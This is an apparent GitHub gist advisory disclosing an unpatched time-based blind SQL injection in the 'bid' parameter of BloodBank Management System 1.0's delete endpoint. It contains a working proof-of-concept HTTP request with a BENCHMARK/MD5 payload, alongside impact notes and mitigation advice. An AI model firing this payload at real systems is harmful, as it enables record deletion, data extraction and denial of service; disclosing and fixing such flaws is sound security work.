Skip to content

Instantly share code, notes, and snippets.

@higordiego
Created October 25, 2024 19:58
Show Gist options
  • Save higordiego/bf0cf963ec56cfe0dcaba2956352bafd to your computer and use it in GitHub Desktop.
Save higordiego/bf0cf963ec56cfe0dcaba2956352bafd to your computer and use it in GitHub Desktop.

Affected Version:

  • BloodBank Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection (Time-Based Blind)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable Endpoint:

  • /file/delete.php?bid=6

Vulnerability Description:

A time-based SQL Injection vulnerability was discovered in the delete request functionality of the BloodBank Management System version 1.0. This vulnerability occurs because the bid parameter is not properly sanitized, allowing an attacker to inject malicious SQL commands into the backend database query.

This attack relies on a blind SQL injection technique, where the attacker uses time-based delays (via the BENCHMARK function) to infer if the injection was successful. If the system delays its response, the attacker knows the SQL query was executed, allowing them to:

  • Tamper with or delete sensitive records (e.g., blood bank data).
  • Extract data slowly by chaining multiple queries.
  • Cause Denial of Service (DoS) by overloading the system with intensive queries.

Proof of Concept (PoC):

Below is a GET request demonstrating the vulnerability using a time-based SQL injection payload:

GET /file/delete.php?bid=3'%20AND%204994%3dBENCHMARK(5000000%2cMD5(0x51494778))--%20ntES HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/bloodinfo.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive


Explanation:

This payload injects the SQL command:

' AND 4994=BENCHMARK(5000000, MD5(0x51494778))-- ntES

This causes the backend to execute 5,000,000 MD5 operations, significantly delaying the response if the query executes correctly. The delay confirms that the system is vulnerable to SQL injection.


Image


Impact:

  • Data Integrity Compromise: Attackers can delete or modify blood bank records.
  • Denial of Service (DoS): Repeated injections can exhaust system resources, making the application unresponsive.
  • Unauthorized Access: Attackers can leverage this vulnerability to further explore the database and escalate privileges.

Mitigation Recommendations:

  1. Use Prepared Statements: Employ parameterized queries to prevent SQL injection.
  2. Input Validation: Validate and sanitize the bid parameter to allow only expected values (e.g., numeric IDs).
  3. Database Permissions: Restrict database user privileges to limit the potential damage of SQL injections.
  4. Monitoring & Logging: Track and alert unusual patterns, such as slow queries or repetitive access attempts.
  5. Security Testing: Perform regular penetration testing and code reviews to identify and mitigate vulnerabilities.
  6. Error Handling: Avoid exposing database-related errors in responses, which may assist attackers.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment